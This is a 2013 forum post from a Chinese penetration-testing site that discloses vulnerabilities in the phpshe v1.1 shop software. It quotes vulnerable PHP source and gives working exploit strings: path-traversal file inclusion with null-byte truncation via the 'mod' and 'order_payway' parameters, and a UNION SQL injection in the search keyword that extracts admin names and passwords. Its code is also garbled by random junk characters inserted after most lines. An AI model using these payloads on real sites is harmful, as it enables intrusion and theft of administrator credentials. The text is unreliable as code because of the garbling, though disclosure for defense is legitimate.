中国网络渗透测试联盟

标题: phpshe v1.1多处SQL注入和文件包含漏洞Getshell [打印本页]
作者: admin    时间: 2013-4-19 19:01
标题: phpshe v1.1多处SQL注入和文件包含漏洞Getshell
/*******************************************************/
# C8 i! o: E* m) t* c/* Phpshe v1.1 Vulnerability& W9 `1 L/ {) |; G; R! S/ b7 ~
/* ========================
) p, ^) O7 ?8 u* I/ v/* By: : Kn1f3) B. Y! y$ H/ c5 Y
/* E-Mail : 681796@qq.com
5 D  L+ y: C( G. L/*******************************************************/
# v- r4 U: F/ U2 {# T0×00 整体大概参数传输. t) H. H% j+ k9 v, f% \5 K
2 F3 q4 X% R' O* c- @& y

3 B: x7 _1 a  c- g$ p
. e2 j  T% x7 k; D  n//common.php- `$ D, d3 v8 _6 v
if (get_magic_quotes_gpc()) {" i( E/ G/ Z2 l; m( u; D! k7 ?
!empty($_GET) && extract(pe_trim(pe_stripslashes($_GET)), EXTR_PREFIX_ALL, '_g');
; g+ B* \/ f1 W/ `!empty($_POST) && extract(pe_trim(pe_stripslashes($_POST)), EXTR_PREFIX_ALL, '_p');& @! c- w% ^* v: n# S
}
; ~/ Q% C1 t' I' p: X; `else {
% {# R& q0 N; V4 h6 C% d' `2 O9 d( p- {!empty($_GET) && extract(pe_trim($_GET),EXTR_PREFIX_ALL,'_g');
2 p: F; w  X* @$ ]$ `- Q$ l!empty($_POST) && extract(pe_trim($_POST),EXTR_PREFIX_ALL,'_p');
% M% L5 f3 H1 i4 {- _6 ^3 Y}  b, d% P: i: e2 I/ B
session_start();
/ l9 D+ `5 V3 |!empty($_SESSION) && extract(pe_trim($_SESSION),EXTR_PREFIX_ALL,'_s');, f/ A* ?3 i+ \* }: Y+ S' a0 M
!empty($_COOKIE) && extract(pe_trim(pe_stripslashes($_COOKIE)),EXTR_PREFIX_ALL,'_c');  Y7 b) l1 ]% q5 B

6 |3 p$ F& T2 G7 |! l0 h3 p0×01 包含漏洞
- \2 u. u& k: W$ X / y) @" P* R- o& {7 \5 G

$ U: }9 I" u+ \1 C5 b) p% M9 O# z) G% P6 G. x//首页文件1 q. X1 g, W) W
<!--?php include('common.php'); $cache_category = cache::get('category'); $cache_category_arr = cache::get('category_arr'); $cache_class = cache::get('class'); $cache_ad = cache::get('ad'); $cache_link = cache::get('link'); $cache_page = cache::get('page'); $web_qq = $cache_setting['web_qq']['setting_value'] ? explode(',', $cache_setting['web_qq']['setting_value']) : array(); $cart_num = pe_login('user') ? $db--->pe_num('cart', array('user_id'=>$_s_user_id)) : (unserialize($_c_cart_list) ? count(unserialize($_c_cart_list)) : 0);
8 x5 y) q1 o7 p! v3 A: M9 s6 Q; Zinclude("{$pe['path_root']}module/{$module}/{$mod}.php");  //$mod可控造成“鸡肋”包含漏洞
# Q! q  K4 U4 V3 D$ Lpe_result();7 {# i" ]8 L1 U+ M2 M
?>
4 X! F3 \7 |" h# i9 ~//common 文件 第15行开始
2 L7 W$ V3 ^6 Y, s: L; n$ w) jurl路由配置
' I; `: J1 x5 M6 z( f/ S$module = $mod = $act = 'index';
" B& z% }$ a8 Q$ W/ ~: h6 e$mod = $_POST['mod'] ? $_POST['mod'] : ($_GET['mod'] ? $_GET['mod'] : $mod);
/ ]( _5 G9 H8 P- J% J9 D$act = $_POST['act'] ? $_POST['act'] : ($_GET['act'] ? $_GET['act'] : $act);8 q3 ?3 [, [  Z0 o/ C. Q: k
$id = $_POST['id'] ? $_POST['id'] : ($_GET['id'] ? $_GET['id'] : $id);
4 x, J# \: H3 p4 A) ~  Z: w0 F* z//exp:http://127.0.0.1/phpshe_v1.1/index.php?mod=../../robots.txt%00
8 B6 Y5 ~* k2 Q" s% _. X& |. u. ?


% W- d8 M9 ]" H' |, u* k( i 3 S; M4 Q2 E8 K5 {9 y
0×02 搜索注入
# H6 E' A/ t- h! c; B1 B/ ?$ L. i; ` 9 v1 |0 s) \- Q9 _  [7 R( _
<code id="code2">

//product.php文件
" }6 m8 ?9 m% zcase 'list':
& P' ~" B, I: _- X7 |8 e$category_id = intval($id);2 D7 G% R- P. C6 E) s( w
$info = $db->pe_select('category', array('category_id'=>$category_id));% h( ?$ ^8 b/ B% Y# s8 s
//搜索/ K. x( z5 P; P$ g
$sqlwhere = " and `product_state` = 1";
# U* `5 j8 ~& w; p4 `. w4 d/ Epe_lead('hook/category.hook.php');9 K8 E; m! d0 A- `
if ($category_id) {
" R. x& k" i: N; F& wwhere .= is_array($category_cidarr = category_cidarr($category_id)) ? " and `category_id` in('".implode("','", $category_cidarr)."')" : " and `category_id` = '{$category_id}'";# v/ ~1 F+ _8 Z* N! }
}
) I, w" w9 h! i! C1 Z& V$_g_keyword && $sqlwhere .= " and `product_name` like '%{$_g_keyword}%'"; //keyword变量未进行有效的sql语句过滤- k8 w& Z: w1 B1 y
if ($_g_orderby) {
- Y% ~& H0 [" P) a; x- _$orderby = explode('_', $_g_orderby);
" L6 q8 G1 N( _1 m0 v$sqlwhere .= " order by `product_{$orderby[0]}` {$orderby[1]}";. r' S, h! s$ J& M% u* T
}
. k* Y2 b% k8 T% E* M. Velse {0 j; z. f6 ^+ `8 W/ a& o0 @' X; y1 t
$sqlwhere .= " order by `product_id` desc";
0 [: t- [7 G( K}
4 R+ r5 ]  y# b8 K& q$info_list = $db->pe_selectall('product', $sqlwhere, '*', array(16, $_g_page));2 K; n8 S, [9 a; }7 u8 m6 A
//热卖排行
9 {4 [7 u! _/ o5 B9 y) k; M$product_hotlist = product_hotlist();
* t, l. v* B0 S3 |7 J. g2 \7 N0 Q4 @//当前路径
2 t" S. h# i& V+ ?" u! ^, A9 [$nowpath = category_path($category_id);
9 _, g4 K/ E7 Q  v3 U/ N$seo = pe_seo($info['category_name']);
5 Q/ _* }! P; Z) n/ g$ {include(pe_tpl('product_list.html'));7 r7 h, @( l3 M) @3 N7 u
//跟进selectall函数库
# a8 h2 Q" g1 m0 T; ^! Bpublic function pe_selectall($table, $where = '', $field = '*', $limit_page = array())
% V! L7 n! P' c1 L% P+ T- e{
( ~: ~" J+ ?- A//处理条件语句
: f7 Y% y1 a, W& }9 R9 J$sqlwhere = $this->_dowhere($where);5 o( ^9 ~- Y2 I& J/ S9 u
return $this->sql_selectall("select {$field} from `".dbpre."{$table}` {$sqlwhere}", $limit_page);
' P9 ~8 H/ A+ I1 O8 I/ o}$ l3 \8 U! F2 _
//exp
0 P1 I. T- s; ?# E( `4 Dproduct/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(admin_name,0x27,admin_pw,0x27)+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19 and+'1'='14 F" f7 m# J( d8 x, H

</code>* u5 o' d9 g3 S& T( `2 K
4 ?% a5 p4 w3 |% P6 F% {7 u& y
0×03 包含漏洞2: Y# l; |3 W( m5 ]5 @! r/ b
9 A. B( E2 G; ^) a3 R2 g4 Z8 R
<code id="code3">

//order.php

case 'pay':


, G$ ?& b. c$ B$ Q* \$order_id = pe_dbhold($_g_id);


; o( d+ r+ u( c+ n. ~- ]$cache_payway = cache::get('payway');


8 _1 b7 q% K; f% Xforeach($cache_payway as $k => $v) {


$ R" ~8 l7 ^8 w: X2 L$cache_payway[$k]['payway_config'] = unserialize($cache_payway[$k]['payway_config']);

1 G% B! M; W: o  ^
if ($k == 'bank') {


, M+ S, a6 Q; A! p$cache_payway[$k]['payway_config']['bank_text'] = str_replace(array("\r", "\n", "\t"), '\n', $cache_payway[$k]['payway_config']['bank_text']);


; L( ]- f% E' U, p( D* h% n}


: d, g! _0 c- R6 l- s}


( G- D) Q, h$ }3 P3 O: _$order = $db->pe_select('order', array('order_id'=>$order_id, 'order_state'=>'notpay'));

: q: D8 c5 S9 C) [
!$order['order_id'] && pe_error('订单号错误...');

+ w7 m  r; T) y& m3 o8 B
if (isset($_p_pesubmit)) {

7 l9 Q6 Y8 Y& X* V; O& E
if ($db->pe_update('order', array('order_id'=>$order_id), $_p_info)) {

0 M5 \: m6 j8 E1 T( h5 U
$info_list = $db->pe_selectall('orderdata', array('order_id'=>$order_id));


; i. I7 c  n6 N3 d+ e. A& X+ Uforeach ($info_list as $v) {


- S" s0 r3 W1 h5 k5 ^2 d$order['order_name'] .= "{$v['product_name']};";( ?& [( N9 w# [" W" c: {

# d- P) A+ }* k# x* ]9 o, W
}

* s3 v7 n- M  \, t; A& u
echo '正在为您连接支付网站,请稍后...';

% i: [6 W+ V- C) L+ }  m* t/ a
include("{$pe['path_root']}include/plugin/payway/{$_p_info['order_payway']}/order_pay.php");


9 J. j8 R; C( A1 o8 V1 Z}//当一切准备好的时候就可以进行"鸡肋包含了"

3 |; K% ~% l# ?& m, w
else {

  `8 X2 k3 \' I' Z8 k
pe_error('支付错误...');


! I) s0 B( \/ F5 K7 t) M}

4 y/ e0 |, u/ W2 K8 d4 |
}

+ L$ Y' t6 M0 ]% d' g% B5 p; D
$seo = pe_seo('选择支付方式');

; P: B' q6 J" U; t+ R+ O& _
include(pe_tpl('order_pay.html'));


) ]2 I* c) M7 C' K# S- Mbreak;

}

//exp:

//http://127.0.0.1/phpshe_v1.1/index.php?mod=order&act=pay&id=1304070001

//info%5Border_payway%5D=alipay/../../../1.txt%00&pesubmit=%E7%AB%8B%E5%8D%B3%E6%94%AF%E4%BB%98</code>
0 T0 `7 T7 [0 U2 r



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2